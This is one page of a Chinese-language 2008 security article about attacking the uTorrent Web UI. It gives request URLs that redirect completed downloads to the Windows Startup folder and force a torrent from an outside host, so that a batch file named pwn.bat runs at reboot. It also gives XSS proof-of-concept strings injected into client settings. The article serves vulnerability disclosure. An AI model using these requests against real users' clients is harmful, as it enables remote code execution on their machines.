WEB开发网
开发学院网络安全安全技术 利用基于Web的黑客技术造攻击uTorrent客户端 阅读

利用基于Web的黑客技术造攻击uTorrent客户端

 2008-12-12 13:40:12 来源:WEB开发网   
核心提示: http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:Documents%20and%20SettingsAll%20UsersStart%20MenuProgramsStartup这时,他们的

http://localhost:14774/gui/?action=setsetting&s=dir_completed_download&v=C:Documents%20and%20SettingsAll%20UsersStart%20MenuProgramsStartup

这时,他们的uTorrent的下载首选项现在将变成下面的样子:

利用基于Web的黑客技术造攻击uTorrent客户端

图3 修改后的首选项

这样的话,下载后的文件将被移动到All Users的启动文件夹,并且只要攻击者能够强迫用户下载文件,实际上他们就已经得手了。例如,攻击者可以通过下列方法来强迫用户下载一个torrent文件:

http://localhost:14774/gui/?action=add-url&s=http://www.whatever.com/file.torrent

假设该torrent文件让uTorrent下载一个名为pwn.bat的文件。下载一旦完成,pwn.bat就会位于启动文件夹,所以当用户重新引导系统时该文件就会被执行。但是等一下,情况还会更糟……

三、uTorrent客户端中的跨站脚本漏洞

Utorrent的Web用户界面还容易受到跨站脚本XSS的攻击!还记得之前有关本地Web服务器的危险性的文章吗?详情可以参见《利用跨站脚本攻击Eclipse本地Web服务器》一文。 实际上,那篇文章中介绍的跟本文介绍的漏洞利用有些不同之处。下面是一个用于测试该漏洞的概念验证性质的攻击字符串。

http://localhost:14774/gui/?action=setsetting&s=tracker_ip&v=%3Cscript%3Ealert('xss')%3C/script%3E

http://localhost:14774/gui/?action=setsetting&s=ct_hist_comm&v=%3Cscript%3Ealert('xss')%3C/script%3E

上一页  1 2 3 4  下一页

Tags:利用 基于 Web

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接